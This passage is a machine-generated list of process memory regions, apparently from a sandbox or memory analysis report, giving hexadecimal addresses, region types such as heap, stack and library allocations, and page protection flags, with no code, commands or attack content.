page read and write
|
||
7FF84908A000
|
trusted library allocation
|
page read and write
|
||
1BFCF000
|
stack
|
page read and write
|
||
20690031000
|
trusted library allocation
|
page read and write
|
||
20690449000
|
trusted library allocation
|
page read and write
|
||
2A2C90F6000
|
trusted library allocation
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
1BEDB000
|
stack
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
9FB000
|
heap
|
page read and write
|
||
8CD000
|
heap
|
page read and write
|
||
7E0000
|
trusted library allocation
|
page read and write
|
||
1A700000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
319B000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
1945000
|
heap
|
page read and write
|
||
7FF849158000
|
trusted library allocation
|
page read and write
|
||
EF0000
|
heap
|
page read and write
|
||
7FF8491F0000
|
trusted library allocation
|
page read and write
|
||
205591D2000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
1B23E000
|
stack
|
page read and write
|
||
7FF849290000
|
trusted library allocation
|
page read and write
|
||
206ED5B7000
|
heap
|
page read and write
|
||
1DB1BA71000
|
trusted library allocation
|
page read and write
|
||
7FF848FA7000
|
trusted library allocation
|
page read and write
|
||
205682BF000
|
trusted library allocation
|
page read and write
|
||
1B729000
|
heap
|
page read and write
|
||
2A2B9F92000
|
trusted library allocation
|
page read and write
|
||
2A2C91D5000
|
trusted library allocation
|
page read and write
|
||
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF848F99000
|
trusted library allocation
|
page read and write
|
||
1B7A0000
|
heap
|
page read and write
|
||
7FF848F9E000
|
trusted library allocation
|
page read and write
|
||
F1C000
|
heap
|
page read and write
|
||
206901FB000
|
trusted library allocation
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
206903AB000
|
trusted library allocation
|
page read and write
|
||
20570526000
|
heap
|
page read and write
|
||
2A2C9099000
|
trusted library allocation
|
page read and write
|
||
28E6645C000
|
heap
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
130A3000
|
trusted library allocation
|
page read and write
|
||
B90000
|
heap
|
page read and write
|
||
1B146E04000
|
trusted library allocation
|
page read and write
|
||
28E5E59E000
|
trusted library allocation
|
page read and write
|
||
28E4C480000
|
heap
|
page read and write
|
||
20568348000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
8B5000
|
heap
|
page read and write
|
||
7DF465DF0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
1DB1AD88000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
206EB25C000
|
heap
|
page read and write
|
||
7FF848FA9000
|
trusted library allocation
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
9D2000
|
heap
|
page read and write
|
||
7FF848E18000
|
trusted library allocation
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
2615000
|
trusted library allocation
|
page read and write
|
||
2068188E000
|
trusted library allocation
|
page read and write
|
||
14D1000
|
heap
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
C535AF8000
|
stack
|
page read and write
|
||
314C000
|
trusted library allocation
|
page read and write
|
||
1B146DBB000
|
trusted library allocation
|
page read and write
|
||
87D000
|
heap
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
7A0000
|
heap
|
page read and write
|
||
1B88E000
|
heap
|
page read and write
|
||
2A2C905A000
|
trusted library allocation
|
page read and write
|
||
20568109000
|
trusted library allocation
|
page read and write
|
||
7FF84921B000
|
trusted library allocation
|
page read and write
|
||
1B138457000
|
trusted library allocation
|
page read and write
|
||
10A0000
|
heap
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
1B146FA2000
|
trusted library allocation
|
page read and write
|
||
2A2BA713000
|
trusted library allocation
|
page read and write
|
||
2A2D13E5000
|
heap
|
page read and write
|
||
7FF848E7C000
|
trusted library allocation
|
page execute and read and write
|
||
12A08000
|
trusted library allocation
|
page read and write
|
||
1AA7D000
|
stack
|
page read and write
|
||
1B138371000
|
trusted library allocation
|
page read and write
|
||
28E4C490000
|
heap
|
page read and write
|
||
1DB32355000
|
heap
|
page read and write
|
||
20558CA4000
|
trusted library allocation
|
page read and write
|
||
873000
|
heap
|
page read and write
|
||
1B845000
|
heap
|
page read and write
|
||
206804CC000
|
trusted library allocation
|
page read and write
|
||
1B434000
|
stack
|
page read and write
|
||
BEF000
|
heap
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
EF5000
|
heap
|
page read and write
|
||
7FF848FBE000
|
trusted library allocation
|
page read and write
|
||
668000
|
heap
|
page read and write
|
||
28E4C485000
|
heap
|
page read and write
|
||
1B5BE000
|
stack
|
page read and write
|
||
7FF848FDA000
|
trusted library allocation
|
page read and write
|
||
7FF84920C000
|
trusted library allocation
|
page read and write
|
||
B45000
|
heap
|
page read and write
|
||
C96B10E000
|
stack
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page execute and read and write
|
||
1B146EBD000
|
trusted library allocation
|
page read and write
|
||
FEE6BB9000
|
stack
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
28E663C0000
|
heap
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
7FF84915C000
|
trusted library allocation
|
page read and write
|
||
20690240000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
1B146E94000
|
trusted library allocation
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
2C46000
|
trusted library allocation
|
page read and write
|
||
205592EE000
|
trusted library allocation
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
1B14700D000
|
trusted library allocation
|
page read and write
|
||
206902D1000
|
trusted library allocation
|
page read and write
|
||
2A2D11A6000
|
heap
|
page read and write
|
||
1B134F30000
|
trusted library allocation
|
page read and write
|
||
2A2C9215000
|
trusted library allocation
|
page read and write
|
||
1B4FE000
|
stack
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
1BB70000
|
heap
|
page read and write
|
||
28E664E0000
|
heap
|
page execute and read and write
|
||
1B1AE000
|
stack
|
page read and write
|
||
25D0000
|
heap
|
page execute and read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
7FF848FA9000
|
trusted library allocation
|
page read and write
|
||
28E4F66E000
|
trusted library allocation
|
page read and write
|
||
7FF848DF8000
|
trusted library allocation
|
page read and write
|
||
820000
|
heap
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
2057055F000
|
heap
|
page read and write
|
||
1BCEE000
|
stack
|
page read and write
|
||
1B48E000
|
stack
|
page read and write
|
||
314F000
|
trusted library allocation
|
page read and write
|
||
1DB1BF81000
|
trusted library allocation
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
20568160000
|
trusted library allocation
|
page read and write
|
||
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
7FF848FCE000
|
trusted library allocation
|
page read and write
|
||
2B2F000
|
trusted library allocation
|
page read and write
|
||
11EE000
|
stack
|
page read and write
|
||
1B14F179000
|
heap
|
page read and write
|
||
2A2C943E000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
1B146E23000
|
trusted library allocation
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
7DF4CBE90000
|
trusted library allocation
|
page execute and read and write
|
||
1B090000
|
heap
|
page execute and read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
1B146F3A000
|
trusted library allocation
|
page read and write
|
||
2A2C921E000
|
trusted library allocation
|
page read and write
|
||
2A2857E000
|
stack
|
page read and write
|
||
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
2A2C9329000
|
trusted library allocation
|
page read and write
|
||
875000
|
heap
|
page read and write
|
||
168D000
|
stack
|
page read and write
|
||
88F000
|
heap
|
page read and write
|
||
1B14709F000
|
trusted library allocation
|
page read and write
|
||
205683D7000
|
trusted library allocation
|
page read and write
|
||
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849246000
|
trusted library allocation
|
page read and write
|
||
B30000
|
trusted library allocation
|
page read and write
|
||
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
12561000
|
trusted library allocation
|
page read and write
|
||
206EB258000
|
heap
|
page read and write
|
||
7FF849123000
|
trusted library allocation
|
page read and write
|
||
1B63E000
|
stack
|
page read and write
|
||
2A2C91DC000
|
trusted library allocation
|
page read and write
|
||
2056810E000
|
trusted library allocation
|
page read and write
|
||
B00000
|
trusted library allocation
|
page read and write
|
||
7FF848E9C000
|
trusted library allocation
|
page execute and read and write
|
||
92D000
|
heap
|
page read and write
|
||
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
205562C5000
|
heap
|
page read and write
|
||
206ECD80000
|
heap
|
page read and write
|
||
1BF1F000
|
stack
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
20557FA5000
|
trusted library allocation
|
page read and write
|
||
1282D000
|
trusted library allocation
|
page read and write
|
||
2A2D1437000
|
heap
|
page read and write
|
||
1B14F046000
|
heap
|
page read and write
|
||
FEE67FF000
|
stack
|
page read and write
|
||
2A2C93BD000
|
trusted library allocation
|
page read and write
|
||
7FF8490B6000
|
trusted library allocation
|
page read and write
|
||
7FF848E08000
|
trusted library allocation
|
page read and write
|
||
1BD10000
|
heap
|
page read and write
|
||
1B146E5C000
|
trusted library allocation
|
page read and write
|
||
1C04E000
|
stack
|
page read and write
|
||
7FF849149000
|
trusted library allocation
|
page read and write
|
||
28E4C4D5000
|
heap
|
page read and write
|
||
28E66759000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
1255000
|
heap
|
page read and write
|
||
2A2B7120000
|
heap
|
page read and write
|
||
1B43B000
|
stack
|
page read and write
|
||
2A2BA04D000
|
trusted library allocation
|
page read and write
|
||
28CB000
|
trusted library allocation
|
page read and write
|
||
20567F40000
|
trusted library allocation
|
page read and write
|
||
7FF848E38000
|
trusted library allocation
|
page read and write
|
||
2A2BA7F9000
|
trusted library allocation
|
page read and write
|
||
2A2C9228000
|
trusted library allocation
|
page read and write
|
||
20559D31000
|
trusted library allocation
|
page read and write
|
||
FD0000
|
heap
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E3C000
|
trusted library allocation
|
page execute and read and write
|
||
206901F1000
|
trusted library allocation
|
page read and write
|
||
2A2C92C7000
|
trusted library allocation
|
page read and write
|
||
9C4000
|
heap
|
page read and write
|
||
28E4FB18000
|
trusted library allocation
|
page read and write
|
||
7FF84917A000
|
trusted library allocation
|
page read and write
|
||
7FF849143000
|
trusted library allocation
|
page read and write
|
||
20690401000
|
trusted library allocation
|
page read and write
|
||
1B890000
|
heap
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
28E666B0000
|
heap
|
page read and write
|
||
20680A51000
|
trusted library allocation
|
page read and write
|
||
7FF8491FE000
|
trusted library allocation
|
page read and write
|
||
2A2C9279000
|
trusted library allocation
|
page read and write
|
||
20690319000
|
trusted library allocation
|
page read and write
|
||
205683E1000
|
trusted library allocation
|
page read and write
|
||
20681E01000
|
trusted library allocation
|
page read and write
|
||
1B146D89000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
7FF848FA2000
|
trusted library allocation
|
page read and write
|
||
800000
|
trusted library allocation
|
page read and write
|
||
32A8000
|
trusted library allocation
|
page read and write
|
||
1B48F000
|
stack
|
page read and write
|
||
151A000
|
heap
|
page read and write
|
||
1B134F50000
|
heap
|
page readonly
|
||
1DB1AE34000
|
trusted library allocation
|
page read and write
|
||
7FF849266000
|
trusted library allocation
|
page read and write
|
||
7FF849216000
|
trusted library allocation
|
page read and write
|
||
2C4C000
|
trusted library allocation
|
page read and write
|
||
206902BE000
|
trusted library allocation
|
page read and write
|
||
323B000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page read and write
|
||
205700F0000
|
heap
|
page execute and read and write
|
||
1B137C1D000
|
trusted library allocation
|
page read and write
|
||
20690460000
|
trusted library allocation
|
page read and write
|
||
206ED514000
|
heap
|
page read and write
|
||
C2D000
|
heap
|
page read and write
|
||
1BD70000
|
heap
|
page read and write
|
||
205680C4000
|
trusted library allocation
|
page read and write
|
||
2069034D000
|
trusted library allocation
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
96D000
|
heap
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
BA0000
|
heap
|
page read and write
|
||
7FF848FA7000
|
trusted library allocation
|
page read and write
|
||
6D3000
|
heap
|
page read and write
|
||
20690312000
|
trusted library allocation
|
page read and write
|
||
7FF849280000
|
trusted library allocation
|
page read and write
|
||
20559106000
|
trusted library allocation
|
page read and write
|
||
9E8F537000
|
stack
|
page read and write
|
||
5D6000
|
stack
|
page read and write
|
||
2A2C9263000
|
trusted library allocation
|
page read and write
|
||
1AA30000
|
trusted library allocation
|
page read and write
|
||
C3B000
|
heap
|
page read and write
|
||
7FF849160000
|
trusted library allocation
|
page read and write
|
||
91B000
|
heap
|
page read and write
|
||
1B14EE30000
|
heap
|
page execute and read and write
|
||
2A2BAD6D000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
1B146FC0000
|
trusted library allocation
|
page read and write
|
||
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
1DB1BFA1000
|
trusted library allocation
|
page read and write
|
||
7FF848FA9000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
28E4C440000
|
heap
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
2A2D1210000
|
heap
|
page execute and read and write
|
||
1130000
|
trusted library allocation
|
page read and write
|
||
7FF848ECC000
|
trusted library allocation
|
page execute and read and write
|
||
1BCC0000
|
heap
|
page execute and read and write
|
||
D4E000
|
stack
|
page read and write
|
||
2A2C92AF000
|
trusted library allocation
|
page read and write
|
||
7E7000
|
heap
|
page read and write
|
||
28E6681F000
|
heap
|
page read and write
|
||
205682AF000
|
trusted library allocation
|
page read and write
|
||
2A2C91E2000
|
trusted library allocation
|
page read and write
|
||
206902E9000
|
trusted library allocation
|
page read and write
|
||
206902AF000
|
trusted library allocation
|
page read and write
|
||
1CBF0000
|
heap
|
page read and write
|
||
1DB19E00000
|
trusted library allocation
|
page read and write
|
||
20567F51000
|
trusted library allocation
|
page read and write
|
||
205682D9000
|
trusted library allocation
|
page read and write
|
||
C1E000
|
heap
|
page read and write
|
||
28E665CC000
|
heap
|
page read and write
|
||
1B14ED00000
|
heap
|
page read and write
|
||
2A2C91FB000
|
trusted library allocation
|
page read and write
|
||
2A2C90C1000
|
trusted library allocation
|
page read and write
|
||
7BA000
|
heap
|
page read and write
|
||
1B134FB0000
|
heap
|
page read and write
|
||
2A2C90E0000
|
trusted library allocation
|
page read and write
|
||
20690463000
|
trusted library allocation
|
page read and write
|
||
2A2D13C3000
|
heap
|
page read and write
|
||
3267000
|
trusted library allocation
|
page read and write
|
||
1B75E000
|
heap
|
page read and write
|
||
1B14EEF6000
|
heap
|
page execute and read and write
|
||
7FF848FC5000
|
trusted library allocation
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
536000
|
stack
|
page read and write
|
||
7BC000
|
heap
|
page read and write
|
||
297A000
|
trusted library allocation
|
page read and write
|
||
206ED50C000
|
heap
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
C535C7E000
|
stack
|
page read and write
|
||
718000
|
heap
|
page read and write
|
||
1C31F000
|
stack
|
page read and write
|
||
2BB9000
|
trusted library allocation
|
page read and write
|
||
2A2B9B94000
|
trusted library allocation
|
page read and write
|
||
23C0000
|
heap
|
page execute and read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
1DB19D40000
|
heap
|
page execute and read and write
|
||
1B86D000
|
heap
|
page read and write
|
||
2A2D1320000
|
heap
|
page read and write
|
||
206903B8000
|
trusted library allocation
|
page read and write
|
||
7FF848E4D000
|
trusted library allocation
|
page execute and read and write
|
||
1BB2E000
|
stack
|
page read and write
|
||
148D000
|
heap
|
page read and write
|
||
1B146EB0000
|
trusted library allocation
|
page read and write
|
||
7FF84925D000
|
trusted library allocation
|
page read and write
|
||
C96A33F000
|
stack
|
page read and write
|
||
28E4C5F1000
|
heap
|
page read and write
|
||
131F8000
|
trusted library allocation
|
page read and write
|
||
2A2C9301000
|
trusted library allocation
|
page read and write
|
||
205681F2000
|
trusted library allocation
|
page read and write
|
||
7FF8491E3000
|
trusted library allocation
|
page read and write
|
||
1B146FA9000
|
trusted library allocation
|
page read and write
|
||
7FF848E18000
|
trusted library allocation
|
page read and write
|
||
2A2C931C000
|
trusted library allocation
|
page read and write
|
||
2ADF000
|
trusted library allocation
|
page read and write
|
||
205683CF000
|
trusted library allocation
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
2056808C000
|
trusted library allocation
|
page read and write
|
||
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
2A2C90E9000
|
trusted library allocation
|
page read and write
|
||
1B28E000
|
stack
|
page read and write
|
||
2056817D000
|
trusted library allocation
|
page read and write
|
||
20690070000
|
trusted library allocation
|
page read and write
|
||
20681121000
|
trusted library allocation
|
page read and write
|
||
206ECC50000
|
trusted library allocation
|
page read and write
|
||
2A2C92B4000
|
trusted library allocation
|
page read and write
|
||
C00000
|
heap
|
page read and write
|
||
2A2C9166000
|
trusted library allocation
|
page read and write
|
||
7FF849149000
|
trusted library allocation
|
page read and write
|
||
150C000
|
heap
|
page read and write
|
||
25BE000
|
trusted library allocation
|
page read and write
|
||
1B13853E000
|
trusted library allocation
|
page read and write
|
||
7FF848DED000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
206ED2A0000
|
heap
|
page execute and read and write
|
||
1680000
|
trusted library allocation
|
page read and write
|
||
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
206ED3EC000
|
heap
|
page read and write
|
||
B05000
|
heap
|
page read and write
|
||
2A2C9074000
|
trusted library allocation
|
page read and write
|
||
2A2C931A000
|
trusted library allocation
|
page read and write
|
||
20568237000
|
trusted library allocation
|
page read and write
|
||
23C0000
|
heap
|
page execute and read and write
|
||
92F000
|
heap
|
page read and write
|
||
313A000
|
trusted library allocation
|
page read and write
|
||
2C17000
|
trusted library allocation
|
page read and write
|
||
2A2BA0B0000
|
trusted library allocation
|
page read and write
|
||
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848EB6000
|
trusted library allocation
|
page read and write
|
||
2A0E000
|
stack
|
page read and write
|
||
2A2D117C000
|
heap
|
page read and write
|
||
1740000
|
heap
|
page read and write
|
||
7FF848E33000
|
trusted library allocation
|
page read and write
|
||
941000
|
heap
|
page read and write
|
||
830000
|
trusted library allocation
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
1DB184A0000
|
trusted library allocation
|
page read and write
|
||
20556210000
|
heap
|
page read and write
|
||
2A2C9082000
|
trusted library allocation
|
page read and write
|
||
7FF849152000
|
trusted library allocation
|
page read and write
|
||
665000
|
heap
|
page read and write
|
||
1B14F14E000
|
heap
|
page read and write
|
||
1DB325CB000
|
heap
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page read and write
|
||
20681782000
|
trusted library allocation
|
page read and write
|
||
C4E000
|
stack
|
page read and write
|
||
2056829D000
|
trusted library allocation
|
page read and write
|
||
205680B1000
|
trusted library allocation
|
page read and write
|
||
1B760000
|
heap
|
page read and write
|
||
10DF000
|
stack
|
page read and write
|
||
20568219000
|
trusted library allocation
|
page read and write
|
||
28E4C420000
|
heap
|
page read and write
|
||
28E4E1F0000
|
heap
|
page execute and read and write
|
||
2056821D000
|
trusted library allocation
|
page read and write
|
||
2068115C000
|
trusted library allocation
|
page read and write
|
||
1DB1B53E000
|
trusted library allocation
|
page read and write
|
||
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
9A7000
|
heap
|
page read and write
|
||
7FF849120000
|
trusted library allocation
|
page read and write
|
||
2A2C9299000
|
trusted library allocation
|
page read and write
|
||
20680D71000
|
trusted library allocation
|
page read and write
|
||
28C8000
|
trusted library allocation
|
page read and write
|
||
25EF000
|
stack
|
page read and write
|
||
2A2C922F000
|
trusted library allocation
|
page read and write
|
||
390000
|
heap
|
page read and write
|
||
1B14702C000
|
trusted library allocation
|
page read and write
|
||
206902F7000
|
trusted library allocation
|
page read and write
|
||
95B000
|
heap
|
page read and write
|
||
12818000
|
trusted library allocation
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
7FF848FBE000
|
trusted library allocation
|
page read and write
|
||
1B14F0AC000
|
heap
|
page read and write
|
||
131F3000
|
trusted library allocation
|
page read and write
|
||
12811000
|
trusted library allocation
|
page read and write
|
||
29EF000
|
stack
|
page read and write
|
||
12828000
|
trusted library allocation
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
20558B2E000
|
trusted library allocation
|
page read and write
|
||
26AE000
|
trusted library allocation
|
page read and write
|
||
2A2B8C45000
|
heap
|
page read and write
|
||
7FF849175000
|
trusted library allocation
|
page read and write
|
||
7FF848E6C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849144000
|
trusted library allocation
|
page read and write
|
||
B70000
|
trusted library allocation
|
page read and write
|
||
1DB2A1A1000
|
trusted library allocation
|
page read and write
|
||
1B146F0C000
|
trusted library allocation
|
page read and write
|
||
2069031E000
|
trusted library allocation
|
page read and write
|
||
2A2D145B000
|
heap
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
C18000
|
heap
|
page read and write
|
||
F45000
|
heap
|
page read and write
|
||
1B190000
|
heap
|
page execute and read and write
|
||
2A2B8C40000
|
heap
|
page read and write
|
||
205704B9000
|
heap
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
2069034B000
|
trusted library allocation
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
1B84E000
|
heap
|
page read and write
|
||
1ADEF000
|
stack
|
page read and write
|
||
1B96F000
|
stack
|
page read and write
|
||
7FF848F00000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E06000
|
trusted library allocation
|
page read and write
|
||
1DB323C0000
|
heap
|
page read and write
|
||
206904B0000
|
trusted library allocation
|
page read and write
|
||
7FF8490D7000
|
trusted library allocation
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
2056832B000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
20568260000
|
trusted library allocation
|
page read and write
|
||
FEE6EBC000
|
stack
|
page read and write
|
||
1B83D000
|
stack
|
page read and write
|
||
206903D3000
|
trusted library allocation
|
page read and write
|
||
C96A0F9000
|
stack
|
page read and write
|
||
1AF53000
|
heap
|
page read and write
|
||
FC6000
|
stack
|
page read and write
|
||
F6E000
|
stack
|
page read and write
|
||
1C05E000
|
stack
|
page read and write
|
||
7FF848FA6000
|
trusted library allocation
|
page read and write
|
||
8E2000
|
heap
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
2B90000
|
heap
|
page execute and read and write
|
||
1B146E39000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
11F0000
|
heap
|
page read and write
|
||
FEE6CBE000
|
stack
|
page read and write
|
||
1B1DF000
|
stack
|
page read and write
|
||
20559050000
|
trusted library allocation
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
206ED2F7000
|
heap
|
page execute and read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C91E6000
|
trusted library allocation
|
page read and write
|
||
2A2C90EF000
|
trusted library allocation
|
page read and write
|
||
2A2B7330000
|
heap
|
page read and write
|
||
1DB2A62B000
|
trusted library allocation
|
page read and write
|
||
13B0000
|
heap
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
2A2C92E3000
|
trusted library allocation
|
page read and write
|
||
2A2BA021000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DE4000
|
trusted library allocation
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
7FF849152000
|
trusted library allocation
|
page read and write
|
||
C96A1FB000
|
stack
|
page read and write
|
||
1B6E6000
|
heap
|
page read and write
|
||
2A284FA000
|
stack
|
page read and write
|
||
2A2D1428000
|
heap
|
page read and write
|
||
C535CFD000
|
stack
|
page read and write
|
||
2866000
|
trusted library allocation
|
page read and write
|
||
1B706000
|
heap
|
page read and write
|
||
17F5000
|
heap
|
page read and write
|
||
AC5000
|
heap
|
page read and write
|
||
2056838B000
|
trusted library allocation
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
C969CF3000
|
stack
|
page read and write
|
||
D75000
|
heap
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
9E8F63B000
|
stack
|
page read and write
|
||
760000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
1BF33000
|
stack
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F15000
|
trusted library allocation
|
page execute and read and write
|
||
5A6000
|
stack
|
page read and write
|
||
1B6BE000
|
stack
|
page read and write
|
||
9E8F3FE000
|
stack
|
page read and write
|
||
206ED510000
|
heap
|
page read and write
|
||
2A2C91D1000
|
trusted library allocation
|
page read and write
|
||
28E4C51E000
|
heap
|
page read and write
|
||
F0A000
|
heap
|
page read and write
|
||
20568178000
|
trusted library allocation
|
page read and write
|
||
1B146F40000
|
trusted library allocation
|
page read and write
|
||
2A2C91E4000
|
trusted library allocation
|
page read and write
|
||
2055926C000
|
trusted library allocation
|
page read and write
|
||
2A2D1170000
|
heap
|
page read and write
|
||
7FF849190000
|
trusted library allocation
|
page read and write
|
||
1C01E000
|
stack
|
page read and write
|
||
1DB184B0000
|
heap
|
page read and write
|
||
1B146E15000
|
trusted library allocation
|
page read and write
|
||
2530000
|
trusted library allocation
|
page read and write
|
||
7FF848EBC000
|
trusted library allocation
|
page execute and read and write
|
||
20557F31000
|
trusted library allocation
|
page read and write
|
||
1B146E8C000
|
trusted library allocation
|
page read and write
|
||
830000
|
trusted library allocation
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
2A2C9251000
|
trusted library allocation
|
page read and write
|
||
1B87E000
|
heap
|
page read and write
|
||
14CE000
|
stack
|
page read and write
|
||
206ED33C000
|
heap
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
7FF848FC0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8491ED000
|
trusted library allocation
|
page read and write
|
||
1B146F4D000
|
trusted library allocation
|
page read and write
|
||
906000
|
heap
|
page read and write
|
||
151F000
|
heap
|
page read and write
|
||
CC4CD07000
|
stack
|
page read and write
|
||
2A2C93F5000
|
trusted library allocation
|
page read and write
|
||
28E4C585000
|
heap
|
page read and write
|
||
E25000
|
heap
|
page read and write
|
||
1B134E54000
|
heap
|
page read and write
|
||
20681339000
|
trusted library allocation
|
page read and write
|
||
2A286F9000
|
stack
|
page read and write
|
||
7FF848E14000
|
trusted library allocation
|
page read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
1DB1A3A8000
|
trusted library allocation
|
page read and write
|
||
2056819F000
|
trusted library allocation
|
page read and write
|
||
1B460000
|
heap
|
page read and write
|
||
152C000
|
heap
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
20568253000
|
trusted library allocation
|
page read and write
|
||
2A2C90EB000
|
trusted library allocation
|
page read and write
|
||
